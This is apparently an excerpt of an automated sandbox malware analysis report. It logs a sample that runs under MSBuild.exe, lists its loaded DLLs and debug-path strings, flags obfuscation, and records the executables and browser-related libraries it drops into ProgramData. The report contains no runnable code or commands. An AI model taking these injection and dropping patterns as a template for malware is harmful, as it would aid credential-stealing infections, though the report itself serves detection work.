Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static file information: File size 6406656 > 1048576

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x60a600

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
Source:	Binary string: converter.pdb source: DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr
Source:	Binary string: PE.pdbH] source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003321000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1678671142.0000000005950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softwaretown.pdb source: DBAAFIDGDA.exe, 00000005.00000000.2060267748.00000000009A2000.00000002.00000001.01000000.0000000B.sdmp, DBAAFIDGDA.exe.1.dr, jen1hg[1].exe.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2434980346.0000000037F67000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: converter.pdbx source: DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: fmradiosoft.pdbX source: 1lKbb2hF7fYToopfpmEvlyRN.exe
Source:	Binary string: PE.pdb source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003321000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1678671142.0000000005950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2428216684.000000002C086000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\GPgmshZsn.pdb source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1679997283.0000000005D53000.00000004.08000000.00040000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000043DC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2634247963.00000000066DB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\xlHkJa.pdb source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2185461295.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: fmradiosoft.pdb source: 1lKbb2hF7fYToopfpmEvlyRN.exe
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hZlPXWfEn.pdb source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2092583255.0000000005BEC000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.33a64d0.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.5950000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00417A40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041CDD5 push ecx; ret	1_2_0041CDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C59B536 push ecx; ret	1_2_6C59B549
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_0182B3FB push edx; iretd	5_2_0182B3FE
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_0182B7FB pushad ; retf	5_2_0182B7FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00419EB5 push ecx; ret	6_2_00419EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0668F456 push ebx; ret	6_2_0668F457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0667D568 push esp; retf	6_2_0667D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0667DB66 push esp; retf	6_2_0667DB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06613C51 push es; retf	6_2_06613C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0664773D push es; ret	6_2_0664773F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06644BF0 push ecx; ret	6_2_06644C03

Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.33a64d0.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.33a64d0.1.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.5950000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.5950000.13.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DGDBKFBAKF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DBAAFIDGDA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DGDBKFBAKF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\DBAAFIDGDA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

1_2_00417A40

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
